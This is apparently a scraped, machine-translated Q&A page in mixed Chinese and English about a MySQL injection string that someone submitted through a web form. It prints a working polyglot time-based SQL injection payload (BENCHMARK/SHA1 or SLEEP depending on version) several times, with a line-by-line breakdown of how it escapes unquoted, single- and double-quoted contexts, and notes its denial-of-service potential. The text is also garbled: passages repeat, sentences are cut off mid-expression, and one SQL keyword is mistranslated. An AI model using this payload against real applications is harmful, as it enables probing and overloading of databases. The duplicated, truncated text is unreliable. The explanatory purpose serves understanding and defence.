Mysql 谁知道这种sql注入?
有人通过取消选中表单中的文本字段来注入以下内容:Mysql 谁知道这种sql注入?,mysql,code-injection,Mysql,Code Injection,有人通过取消选中表单中的文本字段来注入以下内容: IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEA
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/
IF(SUBSTR(@@version,1,1)它的设计目的是,无论输入框的值在旧版本的MySQL上是无引号的、单引号的还是双引号的,都会对CPU造成严重影响,在新版本的MySQL上,保持连接打开,休眠5秒钟
在每种情况下,如果应用程序易受SQL注入攻击,则可能会执行拒绝服务攻击,因为长时间保持连接打开可能会导致服务器资源/可用连接耗尽
-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
---and then ignores the rest, which appears commented:
/*
-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the singlequote:
'
-- ...and then sees this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
--- ...and then sees the next part as a single-quoted string terinated in the client
'|
--but if it's a double-quoted, string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
---and then opens a doublequote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/
——如果不加引号,它会看到:
如果(SUBSTR(@@version,1,1)它被设计为在保持连接打开的情况下睡眠5秒钟,而不管在MySQL的旧版本和更新版本上输入框的值是无引号、单引号还是双引号,都会对CPU造成严重影响
在每种情况下,如果应用程序易受SQL注入攻击,则可能会执行拒绝服务攻击,因为长时间保持连接打开可能会导致服务器资源/可用连接耗尽
-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
---and then ignores the rest, which appears commented:
/*
-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the singlequote:
'
-- ...and then sees this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
--- ...and then sees the next part as a single-quoted string terinated in the client
'|
--but if it's a double-quoted, string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
---and then opens a doublequote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/
——如果不加引号,它会看到:
如果(SUBSTR(@@version,1,1)我认为它在执行时会减慢速度,如果执行得太多,您的数据库将无法访问/非常慢。有点DoS攻击我认为它在执行时会减慢速度,如果执行得太多,您的数据库将无法访问/非常慢。有点DoS攻击